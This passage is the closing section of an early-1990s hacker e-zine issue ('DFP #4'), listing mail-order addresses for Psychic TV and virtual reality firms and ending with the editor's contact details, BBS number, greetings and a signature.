TOPYUS (Psychic TV)
PO Box 18223
Denver, CO 80218
-Genesis P-Orridge's Psychic TV
send a SASE for info on Psychic TV, catalogs, albums, t-shirts,
videos, books, etc.

Virtual Research
1313 Socorro Ave
Sunnyvale, CA 94089
408.739.7114
-a vr firm

VPL Research, Inc.
656 Bair Island Rd. Suite 304
Redwood, CA 94063
415.361.1710
-Jaron Lanier's famous virtual reality firm

Zentech
Box 138
Morgan Bay Rd.
Surry, ME 04684
-cyberpunk, virtual reality merchandise

_____________________________________________________________________________
| |
| see ya! |
|___________|
Welp, that looks like it for now. Have fun!

Again, if you have any questions/comments/concerns/criticisms/corrections or
any additional info, please contact me at ahawks@nyx.cs.du.edu - or on The
Kracker Box BBS at 303.438.1481.

I can be reached at: ahawks@nyx.cs.du.edu, or ahawks@isis.cs.du.edu.

------------------------------------------------------------------------------
##############################################################################
------------------------------------------------------------------------------

Personal Notes: Hello to the RI Hackers from the New Texas Hacker.
Metacom2 send me mail!

Well folks, thats all for DFP #4.

Keep that e-mail coming!


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-= Max Cray =- Freedom
Net: underg%max@uunet.uu.net Justice
UUCP: ...!uunet!underg!max Equality
CI$: 76334,2203 Responsibility



← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT